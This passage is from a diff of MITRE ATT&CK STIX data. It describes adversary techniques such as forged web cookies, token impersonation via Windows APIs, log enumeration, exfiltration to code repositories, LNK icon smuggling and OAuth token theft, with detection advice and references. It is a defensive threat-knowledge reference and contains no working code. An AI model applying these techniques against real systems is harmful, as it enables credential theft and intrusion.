"Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-19T21:25:10.511Z", + "name": "Web Cookies", + "description": "Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.\n\nAdversaries may generate these cookies in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.(Citation: Pass The Cookie) The generation of web cookies often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.\n\nOnce forged, adversaries may use these web cookies to access resources ([Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Volexity SolarWinds)(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Jack Burns, HubSpot" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for anomalous authentication activity, such as logons or other user session activity associated with unknown accounts. Monitor for unexpected and abnormal access to resources, including access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "SaaS", + "IaaS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a", + "created": "2020-12-17T02:14:34.178Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1606/001", + "external_id": "T1606.001" + }, + { + "source_name": "Volexity SolarWinds", + "description": "Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.", + "url": "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/" + }, + { + "source_name": "Unit 42 Mac Crypto Cookies January 2019", + "description": "Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019.", + "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/" + }, + { + "source_name": "Pass The Cookie", + "description": "Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.", + "url": "https://wunderwuzzi23.github.io/blog/passthecookie.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-30T22:18:46.711Z", + "name": "Log Enumeration", + "description": "Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).\n\nHost binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)\n\nAdversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Bilal Bahadır Yenici" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "IaaS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--866d0d6d-02c6-42bd-aa2f-02907fdc0969", + "created": "2023-07-10T16:50:57.587Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1654", + "external_id": "T1654" + }, + { + "source_name": "SIM Swapping and Abuse of the Microsoft Azure Serial Console", + "description": "Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced Attack. Retrieved June 2, 2023.", + "url": "https://www.mandiant.com/resources/blog/sim-swapping-abuse-azure-serial" + }, + { + "source_name": "Cadet Blizzard emerges as novel threat actor", + "description": "Microsoft Threat Intelligence. (2023, June 14). Cadet Blizzard emerges as a novel and distinct Russian threat actor. Retrieved July 10, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/" + }, + { + "source_name": "WithSecure Lazarus-NoPineapple Threat Intel Report 2023", + "description": "Ruohonen, S. & Robinson, S. (2023, February 2). No Pineapple! -DPRK Targeting of Medical Research and Technology Sector. Retrieved July 10, 2023.", + "url": "https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-01-10T17:57:36.177Z", + "name": "Token Impersonation/Theft", + "description": "Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`.(Citation: DuplicateToken function) The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread.\n\nAn adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.\n\nWhen an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Jonny Johnson" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nAnalysts can also monitor for use of Windows APIs such as DuplicateToken(Ex), ImpersonateLoggedOnUser , and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Windows User Account Control", + "System access controls", + "File system access controls" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d", + "created": "2020-02-18T16:39:06.289Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1134/001", + "external_id": "T1134.001" + }, + { + "source_name": "Microsoft Command-line Logging", + "description": "Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.", + "url": "https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing" + }, + { + "source_name": "DuplicateToken function", + "description": "Microsoft. (2021, October 12). DuplicateToken function (securitybaseapi.h). Retrieved January 8, 2024.", + "url": "https://learn.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-duplicatetoken" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-15T19:08:16.882Z", + "name": "Exfiltration to Code Repository", + "description": "Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.\n\nExfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to code repositories. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--86a96bf6-cf8b-411c-aaeb-8959944d64f7", + "created": "2020-03-09T14:51:11.772Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1567/001", + "external_id": "T1567.001" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-14T22:27:04.095Z", + "name": "Cloud Services", + "description": "Adversaries may log into accessible cloud services within a compromised environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078) that are synchronized with or federated to on-premises user identities. The adversary may then perform management actions or access cloud-hosted resources as the logged-on user. \n\nMany enterprises federate centrally managed user identities to cloud services, allowing users to login with their domain credentials in order to access the cloud control plane. Similarly, adversaries may connect to available cloud services through the web console or through the cloud command line interface (CLI) (e.g., [Cloud API](https://attack.mitre.org/techniques/T1059/009)), using commands such as Connect-AZAccount for Azure PowerShell, Connect-MgGraph for Microsoft Graph PowerShell, and gcloud auth login for the Google Cloud CLI.\n\nIn some cases, adversaries may be able to authenticate to these services via [Application Access Token](https://attack.mitre.org/techniques/T1550/001) instead of a username and password. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Office 365", + "Azure AD", + "SaaS", + "IaaS", + "Google Workspace" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--8861073d-d1b8-4941-82ce-dce621d398f0", + "created": "2023-02-21T19:38:13.371Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1021/007", + "external_id": "T1021.007" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Port Knocking", + "description": "Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.\n\nThis technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", + "created": "2020-07-01T18:23:25.002Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1205/001", + "external_id": "T1205.001" + }, + { + "source_name": "Hartrell cd00r 2002", + "description": "Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018.", + "url": "https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-17T02:12:05.242Z", + "name": "LNK Icon Smuggling", + "description": "Adversaries may smuggle commands to download malicious payloads past content filters by hiding them within otherwise seemingly benign windows shortcut files. Windows shortcut files (.LNK) include many metadata fields, including an icon location field (also known as the `IconEnvironmentDataBlock`) designed to specify the path to an icon file that is to be displayed for the LNK file within a host directory. \n\nAdversaries may abuse this LNK metadata to download malicious payloads. For example, adversaries have been observed using LNK files as phishing payloads to deliver malware. Once invoked (e.g., [Malicious File](https://attack.mitre.org/techniques/T1204/002)), payloads referenced via external URLs within the LNK icon location field may be downloaded. These files may also then be invoked by [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)/[System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218) arguments within the target path field of the LNK.(Citation: Unprotect Shortcut)(Citation: Booby Trap Shortcut 2017)\n\nLNK Icon Smuggling may also be utilized post compromise, such as malicious scripts executing an LNK on an infected host to download additional malicious payloads. \n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Michael Raggi @aRtAGGI", + "Andrew Northern, @ex_raritas", + "Gregory Lesnewich, @greglesnewich" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "\n", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--887274fc-2d63-4bdc-82f3-fae56d1d5fdc", + "created": "2023-09-29T15:28:42.409Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1027/012", + "external_id": "T1027.012" + }, + { + "source_name": "Unprotect Shortcut", + "description": "Unprotect Project. (2019, March 18). Shortcut Hiding. Retrieved October 3, 2023.", + "url": "https://unprotect.it/technique/shortcut-hiding/" + }, + { + "source_name": "Booby Trap Shortcut 2017", + "description": "Weyne, F. (2017, April). Booby trap a shortcut with a backdoor. Retrieved October 3, 2023.", + "url": "https://www.uperesia.com/booby-trapped-shortcut" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-01-16T22:47:59.395Z", + "name": "Web Services", + "description": "Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: FireEye APT29) By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Dor Edry, Microsoft" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Once adversaries leverage the web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54", + "created": "2020-10-01T00:50:29.936Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1583/006", + "external_id": "T1583.006" + }, + { + "source_name": "FireEye APT29", + "description": "FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf" + }, + { + "source_name": "ThreatConnect Infrastructure Dec 2020", + "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", + "url": "https://threatconnect.com/blog/infrastructure-research-hunting/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-24T19:41:54.832Z", + "name": "Steal Application Access Token", + "description": "Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.\n\nFor example, in Kubernetes environments, processes running inside a container may communicate with the Kubernetes API server using service account tokens. If a container is compromised, an adversary may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts) Similarly, instances within continuous-development / continuous-integration (CI/CD) pipelines will often use API tokens to authenticate to other services for testing and deployment.(Citation: Cider Security Top 10 CICD Security Risks) If these pipelines are compromised, adversaries may be able to steal these tokens and leverage their privileges.\n\nToken theft can also occur through social engineering, in which case user action may be required to grant access. OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. \n \nAdversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)\n\nApplication access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user. \n\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Suzy Schapperle - Microsoft Azure Red Team", + "Shailesh Tiwary (Indian Army)", + "Mark Wee", + "Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)", + "Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)", + "Ram Pliskin, Microsoft Azure Security Center", + "Jack Burns, HubSpot" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.\n\nSecurity analysts can hunt for malicious apps using the tools available in their CASB, identity provider, or resource provider (depending on platform.) For example, they can filter for apps that are authorized by a small number of users, apps requesting high risk permissions, permissions incongruous with the app’s purpose, or apps with old “Last authorized” fields. A specific app can be investigated using an activity log displaying activities the app has performed, although some activities may be mis-logged as being performed by the user. App stores can be useful resources to further investigate suspicious apps.\n\nAdministrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace", + "Containers" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--890c9858-598c-401d-a4d5-c67ebcdd703a", + "created": "2019-09-04T15:54:25.684Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1528", + "external_id": "T1528" + }, + { + "source_name": "Amnesty OAuth Phishing Attacks, August 2019", + "description": "Amnesty International. (2019, August 16). Evolving Phishing Attacks Targeting Journalists and Human Rights Defenders from the Middle-East and North Africa. Retrieved October 8, 2019.", + "url": "https://www.amnesty.org/en/latest/research/2019/08/evolving-phishing-attacks-targeting-journalists-and-human-rights-defenders-from-the-middle-east-and-north-africa/" + }, + { + "source_name": "Auth0 Understanding Refresh Tokens", + "description": "Auth0 Inc.. (n.d.). Understanding Refresh Tokens. Retrieved December 16, 2021.", + "url": "https://auth0.com/learn/refresh-tokens/" + }, + { + "source_name": "Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019", + "description": "Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.", + "url": "https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/" + }, + { + "source_name": "Cider Security Top 10 CICD Security Risks", + "description": "Daniel Krivelevich and Omer Gil. (n.d.). Top 10 CI/CD Security Risks. Retrieved March 24, 2024.", + "url": "https://www.cidersecurity.io/top-10-cicd-security-risks/" + }, + { + "source_name": "Trend Micro Pawn Storm OAuth 2017", + "description": "Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks" + }, + { + "source_name": "Kubernetes Service Accounts", + "description": "Kubernetes. (2022, February 26). Configure Service Accounts for Pods. Retrieved April 1, 2022.", + "url": "https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/" + }, + { + "source_name": "Microsoft - Azure AD Identity Tokens - Aug 2019", + "description": "Microsoft. (2019, August 29). Microsoft identity platform access tokens. Retrieved September 12, 2019.", + "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens" + }, + { + "source_name": "Microsoft - Azure AD App Registration - May 2019", + "description": "Microsoft. (2019, May 8). Quickstart: Register an application with the Microsoft identity platform. Retrieved September 12, 2019.", + "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app" + }, + { + "source_name": "Microsoft - OAuth Code Authorization flow - June 2019", + "description": "Microsoft. (n.d.). Microsoft identity platform and OAuth 2.0 authorization code flow. Retrieved September 12, 2019.", + "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow" + }, + { + "source_name": "Microsoft Identity Platform Protocols May 2019", + "description": "Microsoft. (n.d.). Retrieved September 12, 2019.", + "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Spearphishing Attachment", + "description": "Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Philip Winther", + "Sebastian Salla, McAfee", + "Robert Simmons, @MalwareUtkonos" + ], + "x_mitre_detection": "Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc", + "created": "2020-10-02T17:08:57.386Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1598/002", + "external_id": "T1598.002" + }, + { + "source_name": "Sophos Attachment", + "description": "Ducklin, P. (2020, October 2). Serious Security: Phishing without links – when phishers bring along their own web pages. Retrieved October 20, 2020.", + "url": 